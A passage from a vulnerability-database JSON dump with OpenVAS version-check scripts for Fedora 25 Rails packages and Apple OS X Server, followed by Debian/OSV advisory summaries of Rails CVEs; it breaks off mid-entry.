script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'rubygem-actioncable'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"affected\", value:\"rubygem-actioncable on Fedora 25\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_xref(name:\"FEDORA\", value:\"2016-5760339e76\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/XOQL7IU7SB6QJRWGKCHRPZQUOIURV63S\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", 
re:\"ssh/login/release=FC25\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC25\")\n{\n\n if ((res = isrpmvuln(pkg:\"rubygem-actioncable\", rpm:\"rubygem-actioncable~5.0.0.1~1.fc25\", rls:\"FC25\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2019-05-29T18:35:41", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2016-12-07T00:00:00", "type": "openvas", "title": "Fedora Update for rubygem-actionpack FEDORA-2016-5760339e76", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-6317", "CVE-2016-6316"], "modified": "2019-03-15T00:00:00", "id": "OPENVAS:1361412562310872094", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310872094", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for rubygem-actionpack FEDORA-2016-5760339e76\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2016 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.872094\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2016-12-07 05:27:14 +0100 (Wed, 07 Dec 2016)\");\n script_cve_id(\"CVE-2016-6316\", \"CVE-2016-6317\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:P/A:N\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Fedora Update for rubygem-actionpack FEDORA-2016-5760339e76\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'rubygem-actionpack'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"affected\", value:\"rubygem-actionpack on Fedora 25\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_xref(name:\"FEDORA\", value:\"2016-5760339e76\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/7SB36DN7LSLP2GHE4LNAQGWXRMHZEU5F\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", 
re:\"ssh/login/release=FC25\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC25\")\n{\n\n if ((res = isrpmvuln(pkg:\"rubygem-actionpack\", rpm:\"rubygem-actionpack~5.0.0.1~2.fc25\", rls:\"FC25\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2019-05-29T18:35:27", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2016-12-07T00:00:00", "type": "openvas", "title": "Fedora Update for rubygem-railties FEDORA-2016-5760339e76", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-6317", "CVE-2016-6316"], "modified": "2019-03-15T00:00:00", "id": "OPENVAS:1361412562310871937", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310871937", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for rubygem-railties FEDORA-2016-5760339e76\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2016 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.871937\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2016-12-07 05:20:47 +0100 (Wed, 07 Dec 2016)\");\n script_cve_id(\"CVE-2016-6316\", \"CVE-2016-6317\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:P/A:N\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Fedora Update for rubygem-railties FEDORA-2016-5760339e76\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'rubygem-railties'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"affected\", value:\"rubygem-railties on Fedora 25\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_xref(name:\"FEDORA\", value:\"2016-5760339e76\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/JWPXPNMF2BDDQ7AGYMPNOYVDE3BN3RFG\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC25\");\n\n 
exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC25\")\n{\n\n if ((res = isrpmvuln(pkg:\"rubygem-railties\", rpm:\"rubygem-railties~5.0.0.1~2.fc25\", rls:\"FC25\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2019-05-29T18:35:24", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2016-12-07T00:00:00", "type": "openvas", "title": "Fedora Update for rubygem-actionview FEDORA-2016-5760339e76", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-6317", "CVE-2016-6316"], "modified": "2019-03-15T00:00:00", "id": "OPENVAS:1361412562310871981", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310871981", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for rubygem-actionview FEDORA-2016-5760339e76\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2016 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.871981\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2016-12-07 05:22:25 +0100 (Wed, 07 Dec 2016)\");\n script_cve_id(\"CVE-2016-6316\", \"CVE-2016-6317\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:P/A:N\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Fedora Update for rubygem-actionview FEDORA-2016-5760339e76\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'rubygem-actionview'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"affected\", value:\"rubygem-actionview on Fedora 25\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_xref(name:\"FEDORA\", value:\"2016-5760339e76\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/INSRTFAYYUM2XLIWRMW2ZQBU6VNPXG6B\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", 
re:\"ssh/login/release=FC25\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC25\")\n{\n\n if ((res = isrpmvuln(pkg:\"rubygem-actionview\", rpm:\"rubygem-actionview~5.0.0.1~2.fc25\", rls:\"FC25\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2019-05-29T18:35:13", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2016-12-07T00:00:00", "type": "openvas", "title": "Fedora Update for rubygem-actionmailer FEDORA-2016-5760339e76", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-6317", "CVE-2016-6316"], "modified": "2019-03-15T00:00:00", "id": "OPENVAS:1361412562310872056", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310872056", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for rubygem-actionmailer FEDORA-2016-5760339e76\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2016 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.872056\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2016-12-07 05:25:50 +0100 (Wed, 07 Dec 2016)\");\n script_cve_id(\"CVE-2016-6316\", \"CVE-2016-6317\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:P/A:N\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Fedora Update for rubygem-actionmailer FEDORA-2016-5760339e76\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'rubygem-actionmailer'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"affected\", value:\"rubygem-actionmailer on Fedora 25\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_xref(name:\"FEDORA\", value:\"2016-5760339e76\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/SVDJLLIW67K6FGDQKQEY6EGTKQ7KXRQU\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", 
re:\"ssh/login/release=FC25\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC25\")\n{\n\n if ((res = isrpmvuln(pkg:\"rubygem-actionmailer\", rpm:\"rubygem-actionmailer~5.0.0.1~1.fc25\", rls:\"FC25\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2019-05-29T18:35:36", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2016-12-07T00:00:00", "type": "openvas", "title": "Fedora Update for rubygem-rails FEDORA-2016-5760339e76", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-6317", "CVE-2016-6316"], "modified": "2019-03-15T00:00:00", "id": "OPENVAS:1361412562310871890", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310871890", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for rubygem-rails FEDORA-2016-5760339e76\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2016 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.871890\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2016-12-07 05:19:40 +0100 (Wed, 07 Dec 2016)\");\n script_cve_id(\"CVE-2016-6316\", \"CVE-2016-6317\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:P/A:N\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Fedora Update for rubygem-rails FEDORA-2016-5760339e76\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'rubygem-rails'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"affected\", value:\"rubygem-rails on Fedora 25\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_xref(name:\"FEDORA\", value:\"2016-5760339e76\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/WAMEZEEF5UHZPV5IDQY4ZP5VLSRSFHY5\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC25\");\n\n 
exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC25\")\n{\n\n if ((res = isrpmvuln(pkg:\"rubygem-rails\", rpm:\"rubygem-rails~5.0.0.1~1.fc25\", rls:\"FC25\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2019-07-17T14:21:16", "description": "This host is installed with Apple OS X Server\n and is prone to denial of service and user enumeration vulnerabilities.", "cvss3": {}, "published": "2017-04-03T00:00:00", "type": "openvas", "title": "Apple OS X Server Denial of Service And User Enumeration Vulnerabilities", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-2382", "CVE-2016-0751", "CVE-2007-6750"], "modified": "2019-07-05T00:00:00", "id": "OPENVAS:1361412562310810599", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310810599", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Apple OS X Server Denial of Service And User Enumeration Vulnerabilities\n#\n# Authors:\n# Rinu Kuriakose <krinu@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/o:apple:os_x_server\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.810599\");\n script_version(\"2019-07-05T09:12:25+0000\");\n script_cve_id(\"CVE-2016-0751\", \"CVE-2007-6750\", \"CVE-2017-2382\");\n script_bugtraq_id(90690, 90689);\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_tag(name:\"last_modification\", value:\"2019-07-05 09:12:25 +0000 (Fri, 05 Jul 2019)\");\n script_tag(name:\"creation_date\", value:\"2017-04-03 10:32:56 +0530 (Mon, 03 Apr 2017)\");\n script_name(\"Apple OS X Server Denial of Service And User Enumeration Vulnerabilities\");\n\n script_tag(name:\"summary\", value:\"This host is installed with Apple OS X Server\n and is prone to denial of service and user enumeration vulnerabilities.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws exists due to,\n\n - An insufficient permission check for access in Wiki server.\n\n - The partial HTTP requests in Web Server.\n\n - The caching for unknown MIME types, which can cause a global cache to grow\n indefinitely.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow attackers\n to enumerate users and cause a denial of service condition.\");\n\n script_tag(name:\"affected\", value:\"Apple OS X Server before 5.3\");\n\n script_tag(name:\"solution\", value:\"Upgrade to Apple OS X Server 5.3 or\n later.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", 
value:\"executable_version\");\n script_xref(name:\"URL\", value:\"https://support.apple.com/en-us/HT207604\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"General\");\n script_dependencies(\"gb_apple_macosx_server_detect.nasl\");\n script_mandatory_keys(\"Apple/OSX/Server/Version\", \"ssh/login/osx_version\");\n exit(0);\n}\n\ninclude(\"version_func.inc\");\ninclude(\"host_details.inc\");\n\nosVer = get_kb_item(\"ssh/login/osx_version\");\nif(!osVer || version_is_less(version:osVer, test_version:\"10.12.4\")){\n exit(0);\n}\n\nif(!serVer = get_app_version(cpe:CPE)){\n exit(0);\n}\n\nif(version_is_less(version:serVer, test_version:\"5.3\"))\n{\n report = report_fixed_ver(installed_version:serVer, fixed_version:\"5.3\");\n security_message(data:report);\n exit(0);\n}\n\nexit(99);", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}], "osv": [{"lastseen": "2022-08-10T07:11:05", "description": "\nTwo vulnerabilities have been discovered in Rails, a web application\nframework written in Ruby. Both vulnerabilities affect Action Pack, which\nhandles the web requests for Rails.\n\n\n* [CVE-2016-2097](https://security-tracker.debian.org/tracker/CVE-2016-2097)\nCrafted requests to Action View, one of the components of Action Pack,\n might result in rendering files from arbitrary locations, including\n files beyond the application's view directory. 
This vulnerability is\n the result of an incomplete fix of \n [CVE-2016-0752](https://security-tracker.debian.org/tracker/CVE-2016-0752).\n This bug was found by Jyoti Singh and Tobias Kraze from Makandra.\n* [CVE-2016-2098](https://security-tracker.debian.org/tracker/CVE-2016-2098)\nIf a web applications does not properly sanitize user inputs, an\n attacker might control the arguments of the render method in a\n controller or a view, resulting in the possibility of executing\n arbitrary ruby code.\n This bug was found by Tobias Kraze from Makandra and joernchen of\n Phenoelit.\n\n\nFor the stable distribution (jessie), these problems have been fixed in\nversion 2:4.1.8-1+deb8u2.\n\n\nFor the testing distribution (stretch), these problems have been fixed\nin version 2:4.2.5.2-1.\n\n\nFor the unstable distribution (sid), these problems have been fixed in\nversion 2:4.2.5.2-1.\n\n\nWe recommend that you upgrade your rails packages.\n\n\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 7.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 3.6}, "published": "2016-03-09T00:00:00", "type": "osv", "title": "rails - security update", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-2098", "CVE-2016-0752", "CVE-2016-2097"], 
"modified": "2022-08-10T07:10:58", "id": "OSV:DSA-3509-1", "href": "https://osv.dev/vulnerability/DSA-3509-1", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-03-28T05:37:03", "description": "Directory traversal vulnerability in Action View in Ruby on Rails before 3.2.22.2 and 4.x before 4.1.14.2 allows remote attackers to read arbitrary files by leveraging an application's unrestricted use of the render method and providing a .. (dot dot) in a pathname. NOTE: this vulnerability exists because of an incomplete fix for CVE-2016-0752.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2017-10-24T18:33:35", "type": "osv", "title": "actionview Path Traversal vulnerability", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": true, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-0752", "CVE-2016-2097"], "modified": "2023-03-28T05:37:01", "id": "OSV:GHSA-VX9J-46RH-FQR8", "href": "https://osv.dev/vulnerability/GHSA-vx9j-46rh-fqr8", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2022-07-21T08:26:15", "description": "\nMultiple security issues have been discovered in the Ruby on Rails web\napplication development framework, which may 
result in denial of service,\ncross-site scripting, information disclosure or bypass of input\nvalidation.\n\n\nFor the stable distribution (jessie), these problems have been fixed in\nversion 2:4.1.8-1+deb8u1.\n\n\nFor the unstable distribution (sid), these problems have been fixed in\nversion 2:4.2.5.1-1.\n\n\nWe recommend that you upgrade your rails packages.\n\n\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "baseScore": 7.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 3.6}, "published": "2016-01-31T00:00:00", "type": "osv", "title": "rails - security update", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-7577", "CVE-2015-3227", "CVE-2015-7576", "CVE-2016-0751", "CVE-2015-7581", "CVE-2016-0753", "CVE-2015-3226", "CVE-2016-0752"], "modified": "2022-07-21T05:48:56", "id": "OSV:DSA-3464-1", "href": "https://osv.dev/vulnerability/DSA-3464-1", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2022-07-21T08:25:32", "description": "\nAndrew Carpenter of Critical Juncture discovered a cross-site scripting\nvulnerability affecting Action View in rails, a web application\nframework written in Ruby. 
